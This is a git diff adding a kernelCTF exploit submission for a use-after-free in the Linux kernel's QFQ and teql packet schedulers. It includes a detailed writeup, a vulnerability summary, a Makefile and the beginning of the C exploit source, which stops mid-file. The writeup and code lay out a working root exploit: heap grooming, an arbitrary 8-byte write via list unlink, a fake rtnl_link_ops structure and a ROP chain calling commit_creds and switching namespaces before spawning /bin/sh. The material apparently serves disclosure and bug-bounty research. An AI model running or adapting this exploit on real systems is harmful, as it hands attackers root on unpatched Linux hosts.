diff --git a/pocs/linux/kernelctf/CVE-2026-23074_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2026-23074_cos/docs/exploit.md new file mode 100644 index 000000000..2705184ec --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23074_cos/docs/exploit.md @@ -0,0 +1,443 @@ +# **Vulnerability** + +## Summary + +Unlike a normal qdisc, the teql qdisc does not increment `sch->q.qlen` on enqueue and only updates it at dequeue time. Additionally, `teql_peek()` always returns NULL. + +This can cause problems when teql is used as a child qdisc of another qdisc. In the case of QFQ, `qdisc_dequeue()` is only called after peek succeeds. Since teql's peek always returns NULL, dequeue is never invoked. And because dequeue is never invoked, teql's `sch->q.qlen` is never updated, so `cl->qdisc->q.qlen` remains 0 even when packets actually exist inside teql. + +If the class's lmax is changed in this state, `qfq_change_class()` calls `qfq_deact_rm_from_agg()`. This function determines whether the class is active based on `sch->q.qlen`, and since `sch->q.qlen` is 0, it incorrectly judges the class as "inactive." However, the class was actually still linked in the aggregate's slot list, and this linkage is not cleaned up before the aggregate is freed. As a result, when the deferred packets are later scheduled, a dangling pointer is dereferenced, triggering a Use-After-Free that can potentially lead to privilege escalation. + +## **Vulnerability Analysis** + +### Aggregate Creation via `qfq_change_class()` + +When creating or changing a class in QFQ, `qfq_change_class()` is called. + +```c +static int qfq_change_class(struct Qdisc *sch, u32 classid, u32 parentid, + struct nlattr **tca, unsigned long *arg, + struct netlink_ext_ack *extack) +{ + struct qfq_sched *q = qdisc_priv(sch); + struct qfq_class *cl = (struct qfq_class *)*arg; + bool existing = false; + struct nlattr *tb[TCA_QFQ_MAX + 1]; + struct qfq_aggregate *new_agg = NULL; + u32 weight, lmax, inv_w, old_weight, old_lmax; +... +set_change_agg: + sch_tree_lock(sch); + new_agg = qfq_find_agg(q, lmax, weight); + if (new_agg == NULL) { /* create new aggregate */ + sch_tree_unlock(sch); + new_agg = kzalloc(sizeof(*new_agg), GFP_KERNEL); // [1] + if (new_agg == NULL) { + err = -ENOBUFS; + gen_kill_estimator(&cl->rate_est); + goto destroy_class; + } + sch_tree_lock(sch); + qfq_init_agg(q, new_agg, lmax, weight); + } + if (existing) + qfq_deact_rm_from_agg(q, cl); // [2] + else + qdisc_class_hash_insert(&q->clhash, &cl->common); + qfq_add_to_agg(q, new_agg, cl); + sch_tree_unlock(sch); + ... +} +``` + +When creating a class in QFQ, if no matching aggregate is found by `qfq_find_agg()`, a new aggregate is allocated at [1]. When changing the attributes of an existing class, `qfq_deact_rm_from_agg()` is called at [2] to remove the class from its current aggregate. + +```c +static struct qfq_aggregate *qfq_find_agg(struct qfq_sched *q, + u32 lmax, u32 weight) +{ + struct qfq_aggregate *agg; + + hlist_for_each_entry(agg, &q->nonfull_aggs, nonfull_next) + if (agg->lmax == lmax && agg->class_weight == weight) + return agg; + + return NULL; +} +``` + +`qfq_find_agg()` considers an aggregate to be the same only when both lmax and weight match. Therefore, classes with different weight or lmax values are each linked to separate aggregates. + +By setting up the following structure, separate aggregates are created for class 1:1 and class 1:2 respectively. + +```text +ROOT qdisc 1:0 (QFQ) + ├── class 1:1 (weight=15, lmax=16384) -> netem + └── class 1:2 (weight=1, lmax=1514) -> teql +``` + +The teql qdisc, unlike a normal qdisc, does not increment `sch->q.qlen` on enqueue — it only updates `sch->q.qlen` at dequeue time — and `teql_peek()` always returns NULL. + +```c +static int +teql_enqueue(struct sk_buff *skb, struct Qdisc *sch, struct sk_buff **to_free) +{ + struct net_device *dev = qdisc_dev(sch); + struct teql_sched_data *q = qdisc_priv(sch); + + if (q->q.qlen < READ_ONCE(dev->tx_queue_len)) { + __skb_queue_tail(&q->q, skb); + return NET_XMIT_SUCCESS; + } + + return qdisc_drop(skb, sch, to_free); +} + +static struct sk_buff * +teql_dequeue(struct Qdisc *sch) +{ + struct teql_sched_data *dat = qdisc_priv(sch); + ... + skb = __skb_dequeue(&dat->q); + ... + sch->q.qlen = dat->q.qlen + q->q.qlen; + return skb; +} + +static struct sk_buff * +teql_peek(struct Qdisc *sch) +{ + /* teql is meant to be used as root qdisc */ + return NULL; +} +``` + +This can cause problems when teql is used as a child qdisc of another qdisc. In the case of QFQ, `qdisc_dequeue()` is only called after `qdisc_peek_head()` succeeds. Since teql's peek always returns NULL, dequeue is never invoked. And because dequeue is never invoked, teql's `sch->q.qlen` is never updated, so `cl->qdisc->q.qlen` remains 0 even when packets actually exist inside teql. + +### Slot List Linkage of Aggregates + +When a packet is enqueued to the QFQ class of class 1:1, `qfq_dequeue()` is triggered, which in turn calls `qfq_schedule_agg()` → `qfq_slot_insert()`, storing the address of the class 1:1 aggregate in `slots[0].first`. + +```c +static void qfq_slot_insert(struct qfq_group *grp, struct qfq_aggregate *agg, + u64 roundedS) +{ + u64 slot = (roundedS - grp->S) >> grp->slot_shift; + unsigned int i; /* slot index in the bucket list */ + ... + i = (grp->front + slot) % QFQ_MAX_SLOTS; + + hlist_add_head(&agg->next, &grp->slots[i]); + __set_bit(slot, &grp->full_slots); +} +``` + +In `hlist_add_head(&agg->next, &grp->slots[i])`, the aggregate's address is inserted into `grp->slots[i]`. + +When a packet is enqueued to the QFQ class of class 1:2, `qfq_enqueue()` → `qfq_activate_agg()` → `qfq_schedule_agg()` → `qfq_slot_insert()` is called, storing the address of the class 1:2 aggregate in `slots[0].first`. + +Subsequently, as the enqueued packet is dequeued, `qfq_schedule_agg(q, in_serv_agg)` is triggered within `qfq_dequeue()`, which calls `qfq_slot_insert()`. Since `in_serv_agg` is the class 1:1 aggregate, this causes the address of the class 1:1 aggregate to be stored in `slots[0].first` once again. Then `qfq_dequeue()` continues to operate, performing `qfq_choose_next_agg()` → `qfq_front_slot_remove()`, during which the class 1:1 aggregate is removed from `slots[0].first`, leaving the address of the class 1:2 aggregate in `slots[0].first` . + +```c +static struct sk_buff *qfq_dequeue(struct Qdisc *sch) +{ + struct qfq_sched *q = qdisc_priv(sch); + struct qfq_aggregate *in_serv_agg = q->in_serv_agg; + struct qfq_class *cl; + struct sk_buff *skb = NULL; + /* next-packet len, 0 means no more active classes in in-service agg */ + unsigned int len = 0; + ... + if (len == 0 || in_serv_agg->budget < len) { + charge_actual_service(in_serv_agg); + + /* recharge the budget of the aggregate */ + in_serv_agg->initial_budget = in_serv_agg->budget = + in_serv_agg->budgetmax; + + if (!list_empty(&in_serv_agg->active)) { + /* + * Still active: reschedule for + * service. Possible optimization: if no other + * aggregate is active, then there is no point + * in rescheduling this aggregate, and we can + * just keep it as the in-service one. This + * should be however a corner case, and to + * handle it, we would need to maintain an + * extra num_active_aggs field. + */ + qfq_update_agg_ts(q, in_serv_agg, requeue); + qfq_schedule_agg(q, in_serv_agg); + } else if (sch->q.qlen == 0) { /* no aggregate to serve */ + q->in_serv_agg = NULL; + return NULL; + } + + /* + * If we get here, there are other aggregates queued: + * choose the new aggregate to serve. + */ + in_serv_agg = q->in_serv_agg = qfq_choose_next_agg(q); + skb = qfq_peek_skb(in_serv_agg, &cl, &len); + } +... + return skb; +} +``` + +### Dangling Pointer Generation + +When the class 1:2 attributes are changed (lmax change), `qfq_change_class()` → `qfq_deact_rm_from_agg()` → `qfq_rm_from_agg()` → `qfq_destroy_agg()` is executed, freeing the class 1:2 aggregate. + +```c +/* Deschedule class and remove it from its parent aggregate. */ +static void qfq_deact_rm_from_agg(struct qfq_sched *q, struct qfq_class *cl) +{ + if (cl->qdisc->q.qlen > 0) /* class is active */ // [3] + qfq_deactivate_class(q, cl); + + qfq_rm_from_agg(q, cl); +} +``` + +At [3], since teql's `sch->q.qlen` is always 0, the condition is not entered. As a result, `qfq_deactivate_class()` is never called, and the aggregate is not removed from the slot list. + +```c +/* Remove class from its parent aggregate. */ +static void qfq_rm_from_agg(struct qfq_sched *q, struct qfq_class *cl) +{ + struct qfq_aggregate *agg = cl->agg; + + cl->agg = NULL; + if (agg->num_classes == 1) { /* agg being emptied, destroy it */ + qfq_destroy_agg(q, agg); + return; + } + qfq_update_agg(q, agg, agg->num_classes-1); +} + +static void qfq_destroy_agg(struct qfq_sched *q, struct qfq_aggregate *agg) +{ + hlist_del_init(&agg->nonfull_next); + q->wsum -= agg->class_weight; + if (q->wsum != 0) + q->iwsum = ONE_FP / q->wsum; + + if (q->in_serv_agg == agg) + q->in_serv_agg = qfq_choose_next_agg(q); + kfree(agg); // [4] +} +``` + +When the last class is removed from the aggregate, `qfq_destroy_agg()` is called. At [4], the aggregate is freed, but since the address of the class 1:2 aggregate still remains in `slots[0].first`, a dangling pointer is created. + +### Use-After-Free Trigger + +At this point, when `qfq_dequeue()` is triggered again due to the delayed netem, `qfq_choose_next_agg()` is called, which invokes `qfq_front_slot_remove(grp)`. In `qfq_slot_head(grp)`, the freed class 1:2 aggregate is retrieved and used, triggering a Use-After-Free. + +```c +static struct qfq_aggregate *qfq_choose_next_agg(struct qfq_sched *q) +{ + struct qfq_group *grp; + struct qfq_aggregate *agg, *new_front_agg; + u64 old_F; + + qfq_update_eligible(q); + q->oldV = q->V; + + if (!q->bitmaps[ER]) + return NULL; + + grp = qfq_ffs(q, q->bitmaps[ER]); + old_F = grp->F; + + agg = qfq_slot_head(grp); + + /* agg starts to be served, remove it from schedule */ + qfq_front_slot_remove(grp); // [5] +... + return agg; +} + +static void qfq_front_slot_remove(struct qfq_group *grp) +{ + struct qfq_aggregate *agg = qfq_slot_head(grp); // [6] + + BUG_ON(!agg); + hlist_del(&agg->next); // [7] + if (hlist_empty(&grp->slots[grp->front])) + __clear_bit(0, &grp->full_slots); +} + +static struct qfq_aggregate *qfq_slot_head(struct qfq_group *grp) +{ + return hlist_entry(grp->slots[grp->front].first, + struct qfq_aggregate, next); +} +``` + +At [5], when attempting to remove the first aggregate from the slot, the freed class 1:2 aggregate is retrieved at [6], and a Use-After-Free is triggered at [7]. + +# Exploit + +## UAF-Unlink + +```c +struct qfq_aggregate { + struct hlist_node next; /* 0 16 */ + u64 S; /* 16 8 */ + u64 F; /* 24 8 */ + struct qfq_group * grp; /* 32 8 */ + u32 class_weight; /* 40 4 */ + int lmax; /* 44 4 */ + u32 inv_w; /* 48 4 */ + u32 budgetmax; /* 52 4 */ + u32 initial_budget; /* 56 4 */ + u32 budget; /* 60 4 */ + int num_classes; /* 64 4 */ + /* XXX 4-byte hole */ + struct list_head active; /* 72 16 */ + struct hlist_node nonfull_next; /* 88 16 */ +}; +``` + +The `qfq_aggregate` structure is 104 bytes in size, corresponding to kmalloc-128. + +The point where the Use-After-Free occurs is `hlist_del()`, and the code is as follows: + +```c +static inline void hlist_del(struct hlist_node *n) +{ + __hlist_del(n); + n->next = LIST_POISON1; + n->pprev = LIST_POISON2; +} + +static inline void __hlist_del(struct hlist_node *n) +{ + struct hlist_node *next = n->next; + struct hlist_node **pprev = n->pprev; + + WRITE_ONCE(*pprev, next); // [8] + if (next) + WRITE_ONCE(next->pprev, pprev); +} +``` + +The unlink operation is performed at [8] in `__hlist_del()`. If another object can be allocated in the freed region and its values manipulated, this becomes a primitive capable of writing 8 bytes to an arbitrary address. + +This vulnerability shares similar characteristics with CVE-2025-38477, so the LL_ATK and NPerm techniques presented in that exploit were utilized. + +## Constructing an Arbitrary 8-byte Write Primitive + +To construct a primitive capable of writing 8 bytes to an arbitrary address, the `hlist_node` structure values located at offsets 0x0 and 0x8 of the freed region must be controllable. PGV was used for this purpose. + +1. Numerous aggregate objects are allocated before and after the UAF-triggering object allocation, so that the entire page where the vulnerable object resides is filled with objects of the same type. +2. After freeing all aggregate objects, the vulnerable object is freed so that the entire page containing the UAF object is returned to the buddy allocator. +3. PGV is sprayed onto the returned buddy page to reclaim the page containing the UAF object, allowing control over the hlist_node values and thereby obtaining an arbitrary 8-byte write primitive. + +With the arbitrary write primitive secured, LL_ATK can be performed. LL_ATK is a technique that uses a UAF-Unlink primitive to insert a fake node created by the attacker into an existing kernel linked list, then induces code execution through normal kernel flow. + +In this exploit, code execution was achieved by corrupting a function pointer in `rtnl_link_ops`. + +Once function pointer corruption is possible, a suitable location must be selected for placing the fake node that will hold the ROP chain. The NPerm technique was utilized here. +During kernel initialization, there are cases where certain freed pages are not fully unmapped from specific kernel resource regions. These pages can later be reallocated in response to userspace `mmap()` requests, resulting in the same page being simultaneously mapped in both userspace and kernel space. + +This allows the page contents to be freely manipulated from userspace, and as long as KASLR is bypassed, the kernel virtual address of the page can be calculated. In other words, a kernel memory region is secured where both memory control and address prediction are simultaneously possible. + +In this exploit, the [__init_begin, __init_end] region was designated as the fake node location, and ROP gadgets were placed across all pages after mmap(). + +## ROP + +### Bypassing `qfq_peek_skb()` + +Before ROP execution, in the `qfq_dequeue()` flow where the UAF occurs, the `(*cl)->qdisc->ops->peek()` call in `qfq_peek_skb()` is executed first. + +```c +static inline struct sk_buff *qfq_peek_skb(struct qfq_aggregate *agg, + struct qfq_class **cl, + unsigned int *len) +{ + struct sk_buff *skb; + + *cl = list_first_entry(&agg->active, struct qfq_class, alist); + skb = (*cl)->qdisc->ops->peek((*cl)->qdisc); + if (skb == NULL) + qdisc_warn_nonwc("qfq_dequeue", (*cl)->qdisc); + else + *len = qdisc_pkt_len(skb); + + return skb; +} +``` + +After analyzing the register state at this point, no suitable gadget was found for a stack pivot. Therefore, an `xor eax, eax; ret` gadget was used to return NULL and pass through this stage. + +```c +((size_t*)addr)[FAKE_CL_PTR] = cl; +((size_t*)addr)[FAKE_QDISC_PTR] = qdisc; +((size_t*)addr)[FAKE_OPS_PEEK_PTR] = xor_eax_jmp; // Bypass by returning NULL +``` + +ROP Chain Construction + +Exploit code: + +```cpp + RopChain rop(*g_target, kaslr); + // skip + rop.Add(stack_shift2_ret); + rop.Add(0); + rop.Add(init_region_base + FAKE_KIND_STRING_INDEX * sizeof(size_t)); + rop.Add(stack_shift5_ret); + rop.Add(1); + rop.Add(2); + rop.Add(0); + rop.Add(0); + rop.Add(0); + rop.Add(stack_shift5_ret); + rop.Add(1); + rop.Add(2); + rop.Add(0); + rop.Add(0); + rop.Add(0); + rop.Add(stack_shift2_ret); + rop.Add(0); + rop.Add(stack_pivot); + + // Privilege escalation + rop.AddRopAction(RopActionId::COMMIT_INIT_TASK_CREDS); + rop.AddRopAction(RopActionId::SWITCH_TASK_NAMESPACES, {1}); + + // Return to userspace + rop.Add(swapgs_restore_regs_and_return_to_usermode + 54); + rop.Add(0); + rop.Add(0); + rop.Add((uint64_t)get_shell); + rop.Add(user_cs); + rop.Add(user_rflags); + rop.Add(user_rsp & 0xffffffffffffff00); + rop.Add(user_ss); +``` + +The ROP chain shares a memory region with the fake `rtnl_link_ops` structure. As a result, structure field values such as the `kind` pointer and the `stack_pivot` address are fixed at specific positions within the ROP chain. + +To skip over these fixed values, `stack_shift2_ret` and `stack_shift5_ret` gadgets were used to jump past those regions. + +Privilege escalation is then performed using libxdk's RopActions: + +- COMMIT_INIT_TASK_CREDS: Executes `commit_creds(prepare_kernel_cred(0))` +- SWITCH_TASK_NAMESPACES: Executes `switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)` to switch to the init process's namespace +Finally, execution returns to userspace via `swapgs_restore_regs_and_return_to_usermode`, where the `get_shell()` function is invoked. + +## Exploit Summary + +- **Prefetch** → Kernel base address leak +- **NPerm** → Payload placement adjacent to kernel resources +- **LL_ATK** → Fake node insertion +- **Function pointer trigger** +- **ROP** → Privilege escalation (COMMIT_INIT_TASK_CREDS) + namespace escape (SWITCH_TASK_NAMESPACES) + +## Additional Notes + +This vulnerability shares similar characteristics with CVE-2025-38477, so the LL_ATK and NPerm techniques presented in that exploit were utilized. However, since the related documentation is still in the pull request stage and has not yet been merged, it is referenced by CVE number rather than a direct link. \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2026-23074_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2026-23074_cos/docs/vulnerability.md new file mode 100644 index 000000000..92e91cb59 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23074_cos/docs/vulnerability.md @@ -0,0 +1,13 @@ +# Vulnerability Details + +- **Requirements**: + - **Capabilities**: `CAP_NET_ADMIN` + - **Kernel configuration**: `CONFIG_NET_SCHED=y, CONFIG_NET_SCH_TEQL=y` + - **User namespaces required**: Yes +- **Introduced by**: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 +- **Fixed by**: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=50da4b9d07a7a463e2cfb738f3ad4cff6b2c9c3b +- **Affected Version**: `v2.6.12-rc2 - v6.19-rc6` +- **Affected Component**: `net/sched: sch_teql` +- **Syscall to disable**: `unshare` +- **Cause**: Use-After-Free +- **Description**: A Use-After-Free vulnerability was discovered in the Linux kernel's TC (Traffic Control) scheduler. When teql is used as a child qdisc instead of a root qdisc, qlen is not properly updated, causing the parent qdisc to misjudge the class state, resulting in a dangling pointer and triggering a Use-After-Free. \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/Makefile b/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/Makefile new file mode 100644 index 000000000..00f39bb3f --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/Makefile @@ -0,0 +1,27 @@ +CC = gcc +CXX = g++ +CFLAGS = -static -DKASLR_BYPASS_INTEL=1 +CXXFLAGS = -static -DKASLR_BYPASS_INTEL=1 +LDFLAGS = -lkernelXDK + +all: exploit + +prerequisites: + wget -O target_db.kxdb https://storage.googleapis.com/kernelxdk/db/kernelctf.kxdb + +kaslr_bypass.o: kaslr_bypass.c kaslr_bypass.h + $(CC) $(CFLAGS) -c kaslr_bypass.c -o kaslr_bypass.o + +exploit.o: exploit.c kaslr_bypass.h + $(CXX) $(CXXFLAGS) -c exploit.c -o exploit.o + +exploit: exploit.o kaslr_bypass.o + $(CXX) $(CXXFLAGS) -o exploit exploit.o kaslr_bypass.o $(LDFLAGS) + +exploit_debug: exploit.c kaslr_bypass.c kaslr_bypass.h + $(CC) $(CFLAGS) -g -c kaslr_bypass.c -o kaslr_bypass_dbg.o + $(CXX) $(CXXFLAGS) -g -c exploit.c -o exploit_dbg.o + $(CXX) $(CXXFLAGS) -g -o exploit_debug exploit_dbg.o kaslr_bypass_dbg.o $(LDFLAGS) + +clean: + rm -f exploit exploit_debug *.o \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/exploit b/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/exploit new file mode 100755 index 000000000..60d984737 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/exploit.c b/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/exploit.c new file mode 100644 index 000000000..60d162948 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/exploit.c @@ -0,0 +1,834 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "kaslr_bypass.h" + +#define NLA_F_NESTED (1 << 15) +#define TC_HANDLE(maj, min) (((maj) << 16) | (min)) +#define KASLR_BYPASS_INTEL 1 +#define TC_MSG_BUFSIZE 16384 +#define PAGE_SIZE 0x1000 +#define SPRAY_CLASS_COUNT 128 +#define SPRAY_QDISC TC_HANDLE(100, 0) +#define LOOPBACK_ADDR 0x7F000001 + +// nlmsg tail pointer calculation +#define NLMSG_TAIL(nmsg) ((struct rtattr*)(((char*)(nmsg)) + NLMSG_ALIGN((nmsg)->nlmsg_len))) +#define logd(fmt, ...) dprintf(2, "[*] %s:%d " fmt "\n", __FILE__, __LINE__, ##__VA_ARGS__) + + +// xor eax, eax ; jmp __x86_return_thunk +#define GADGET_XOR_EAX_JMP 0x14b400 + +// "ipvlan" (little-endian) +#define FAKE_KIND_STRING_IPVLAN 0x6e616c767069 +#define FAKE_KIND_STRING_INDEX 0x100 +#define FAKE_CL_PTR 0x0a +#define FAKE_QDISC_PTR 0x23 +#define FAKE_OPS_PEEK_PTR 0x47 +#define FAKE_CL_STRUCT_OFFS 0x100 +#define FAKE_QDISC_STRUCT_OFFS 0x200 +#define FAKE_ROP_CHAIN_OFFS 0x840 +#define FAKE_DUMMY_PTR_OFFS 0x500 +#define FAKE_CL_ALIST_OFFS 0x58 + +typedef struct { + int fd; + char *mapped; + size_t size; +} pgv_frame_t; + +struct nl_req { + struct nlmsghdr nlh; + struct ifinfomsg ifi; + char buf[512]; +}; + +Target* g_target = nullptr; + +uint64_t __init_begin = 0; +uint64_t bond_link_ops = 0; +uint64_t init_region_base = 0; +uint64_t swapgs_restore_regs_and_return_to_usermode = 0; +uint64_t stack_pivot = 0; +uint64_t stack_shift2_ret = 0; +uint64_t stack_shift5_ret = 0; +uint64_t xor_eax_jmp = 0; +unsigned long user_cs,user_ss,user_rsp,user_rflags; +static int spray_ifindex = 0; +pgv_frame_t pgv[2] = {}; +static char g_nl_buf[TC_MSG_BUFSIZE]; + +INCBIN(target_db, "target_db.kxdb"); + +static void save_state() { + asm( + "movq %%cs, %0\n" + "movq %%ss, %1\n" + "movq %%rsp, %2\n" + "pushfq\n" + "popq %3\n" + : "=r" (user_cs), "=r" (user_ss), "=r" (user_rsp),"=r" (user_rflags) : : "memory"); +} + +void setup_cpu_affinity(int cpu) { + cpu_set_t cpu_set; + CPU_ZERO(&cpu_set); + CPU_SET(cpu, &cpu_set); + if (sched_setaffinity(0, sizeof(cpu_set), &cpu_set) != 0) { + perror("sched_setaffinity()"); + exit(EXIT_FAILURE); + } + usleep(1000); +} + +void setup_sandbox() +{ + uid_t uid = getuid(); + gid_t gid = getgid(); + int fd; + char buf[32]; + + if (unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET) < 0) { + perror("unshare"); + exit(1); + } + + fd = open("/proc/self/setgroups", O_WRONLY); + write(fd, "deny", 4); + close(fd); + + fd = open("/proc/self/uid_map", O_WRONLY); + snprintf(buf, sizeof(buf), "0 %d 1", uid); + write(fd, buf, strlen(buf)); + close(fd); + + fd = open("/proc/self/gid_map", O_WRONLY); + snprintf(buf, sizeof(buf), "0 %d 1", gid); + write(fd, buf, strlen(buf)); + close(fd); +} + + +// loopback interface up +static void setup_loopback(void) +{ + int sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_IP); + if (sock < 0) return; + + struct ifreq ifr; + memset(&ifr, 0, sizeof(ifr)); + strcpy(ifr.ifr_name, "lo"); + + ifr.ifr_flags = IFF_UP | IFF_LOOPBACK | IFF_RUNNING; + ioctl(sock, SIOCSIFFLAGS, &ifr); + + struct sockaddr_in *addr = (struct sockaddr_in *)&ifr.ifr_addr; + addr->sin_family = AF_INET; + addr->sin_addr.s_addr = htonl(LOOPBACK_ADDR); + ioctl(sock, SIOCSIFADDR, &ifr); + + close(sock); +} + +void setup_env(void){ + setup_sandbox(); + setup_cpu_affinity(0); + save_state(); + setup_loopback(); +} + +void get_shell(void) +{ + int mntns_fd = open("/proc/1/ns/mnt", O_RDONLY); + if (mntns_fd >= 0) { + setns(mntns_fd, CLONE_NEWNS); + close(mntns_fd); + } + + static const char *sh_args[] = {"/bin/sh", nullptr}; + execve("/bin/sh", (char *const *)sh_args, nullptr); +} + +// KASLR-adjusted kernel symbol/gadget address calculation +void setup_kernel_address() { + + __init_begin = kaslr + g_target->GetSymbolOffset("__init_begin"); + bond_link_ops = kaslr + g_target->GetSymbolOffset("bond_link_ops"); + swapgs_restore_regs_and_return_to_usermode = kaslr + g_target->GetSymbolOffset("swapgs_restore_regs_and_return_to_usermode"); + xor_eax_jmp = kaslr + g_target->GetSymbolOffset("gadget_xor_eax_ret"); + + init_region_base = __init_begin + 0x100000; + + auto& pivots = g_target->GetPivots(); + // RCX-based stack pivot search + for (auto& og : pivots.one_gadgets) { + if (og.pivot_reg.reg == Register::RCX) { + stack_pivot = kaslr + og.address; + printf("[+] Found RCX pivot at offset 0x%lx\n", (uint64_t)og.address); + break; + } + } + // Find gadget that skips 2 stack slots + for (auto& ss : pivots.stack_shifts) { + if (ss.shift_amount == 24 && ss.ret_offset == 16) { + stack_shift2_ret = kaslr + ss.address; + break; + } + } + // Find gadget that skip 5 stack slots + for (auto& ss : pivots.stack_shifts) { + if (ss.shift_amount == 48 && ss.ret_offset == 40) { + stack_shift5_ret = kaslr + ss.address; + break; + } + } + +} + +/* + * Netlink message builder + */ + +static struct nlmsghdr* nl_msg_init(void) +{ + struct nlmsghdr* msg = (struct nlmsghdr*)g_nl_buf; + memset(msg, 0, TC_MSG_BUFSIZE); + msg->nlmsg_len = NLMSG_ALIGN(NLMSG_LENGTH(0)); + return msg; +} + +static struct tcmsg* nl_msg_init_tc(struct nlmsghdr* msg, uint16_t type, + uint16_t flags, int ifindex, + uint32_t parent, uint32_t handle) +{ + struct tcmsg* tc; + msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg)); + msg->nlmsg_type = type; + msg->nlmsg_flags = flags; + tc = (struct tcmsg*)NLMSG_DATA(msg); + tc->tcm_family = AF_UNSPEC; + tc->tcm_ifindex = ifindex; + tc->tcm_parent = parent; + tc->tcm_handle = handle; + return tc; +} + +static int nl_attr_put(struct nlmsghdr* msg, int maxlen, int type, + const void* data, int alen) +{ + int len = RTA_LENGTH(alen); + struct rtattr* rta; + if (NLMSG_ALIGN(msg->nlmsg_len) + RTA_ALIGN(len) > (unsigned int)maxlen) + return -1; + rta = NLMSG_TAIL(msg); + rta->rta_type = type; + rta->rta_len = len; + if (alen && data) + memcpy(RTA_DATA(rta), data, alen); + msg->nlmsg_len = NLMSG_ALIGN(msg->nlmsg_len) + RTA_ALIGN(len); + return 0; +} + +static int nl_attr_put_str(struct nlmsghdr* msg, int maxlen, int type, const char* str) +{ + return nl_attr_put(msg, maxlen, type, str, strlen(str) + 1); +} + +static int nl_attr_put_u32(struct nlmsghdr* msg, int maxlen, int type, uint32_t v) +{ + return nl_attr_put(msg, maxlen, type, &v, 4); +} + +static struct rtattr* nl_attr_nest_start(struct nlmsghdr* msg, int maxlen, int type) +{ + struct rtattr* nest = NLMSG_TAIL(msg); + + if (nl_attr_put(msg, maxlen, type | NLA_F_NESTED, NULL, 0) < 0) + return NULL; + return nest; +} + +static void nl_attr_nest_end(struct nlmsghdr* msg, struct rtattr* nest) +{ + nest->rta_len = (char*)NLMSG_TAIL(msg) - (char*)nest; +} + +static int nl_send(int sock, struct nlmsghdr* msg) +{ + struct sockaddr_nl nladdr; + struct iovec iov; + struct msghdr msgh; + memset(&nladdr, 0, sizeof(nladdr)); + nladdr.nl_family = AF_NETLINK; + iov.iov_base = msg; + iov.iov_len = msg->nlmsg_len; + memset(&msgh, 0, sizeof(msgh)); + msgh.msg_name = &nladdr; + msgh.msg_namelen = sizeof(nladdr); + msgh.msg_iov = &iov; + msgh.msg_iovlen = 1; + return sendmsg(sock, &msgh, 0); +} + +// send packet to specific class via classid +static void send_to_class(uint32_t classid, int count) +{ + int sock; + struct sockaddr_in addr; + char data[64] = "trigger"; + + sock = socket(AF_INET, SOCK_DGRAM, 0); + if (sock < 0) + return; + + const char* ifname = "lo"; + setsockopt(sock, SOL_SOCKET, SO_BINDTODEVICE, ifname, strlen(ifname)); + + struct timeval tv = {0, 10000}; + setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv)); + setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv)); + + memset(&addr, 0, sizeof(addr)); + addr.sin_family = AF_INET; + addr.sin_addr.s_addr = htonl(LOOPBACK_ADDR); + addr.sin_port = htons(12345); + + if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == 0) { + int prio = classid; + setsockopt(sock, SOL_SOCKET, SO_PRIORITY, &prio, sizeof(prio)); + for (int i = 0; i < count; i++) + write(sock, data, sizeof(data)); + } + close(sock); +} + +// delete qdisc +static int del_qdisc(int sock, int ifindex, uint32_t parent, uint32_t handle) +{ + struct nlmsghdr* msg = nl_msg_init(); + nl_msg_init_tc(msg, RTM_DELQDISC, NLM_F_REQUEST, ifindex, parent, handle); + return nl_send(sock, msg); +} + +// cleanup TC +static void cleanup_tc(int sock, int ifindex) +{ + del_qdisc(sock, ifindex, TC_H_ROOT, 0); +} + +// add QFQ qdisc +static void add_qdisc_qfq(int sock, int ifindex, uint32_t parent, uint32_t handle) +{ + struct nlmsghdr* msg = nl_msg_init(); + nl_msg_init_tc(msg, RTM_NEWQDISC, NLM_F_REQUEST | NLM_F_CREATE | NLM_F_EXCL,ifindex, parent, handle); + nl_attr_put_str(msg, TC_MSG_BUFSIZE, TCA_KIND, "qfq"); + nl_send(sock, msg); +} + +// add QFQ class +static int add_class_qfq(int sock, int ifindex, uint32_t parent, uint32_t handle, + uint32_t weight, uint32_t limit) +{ + struct rtattr* nest; + struct nlmsghdr* msg = nl_msg_init(); + nl_msg_init_tc(msg, RTM_NEWTCLASS, NLM_F_REQUEST | NLM_F_CREATE, ifindex,parent, handle); + nl_attr_put_str(msg, TC_MSG_BUFSIZE, TCA_KIND, "qfq"); + nest = nl_attr_nest_start(msg, TC_MSG_BUFSIZE, TCA_OPTIONS); + nl_attr_put_u32(msg, TC_MSG_BUFSIZE, TCA_QFQ_WEIGHT,weight); + nl_attr_put_u32(msg, TC_MSG_BUFSIZE, TCA_QFQ_LMAX, limit); + nl_attr_nest_end(msg, nest); + return nl_send(sock, msg); +} + +// 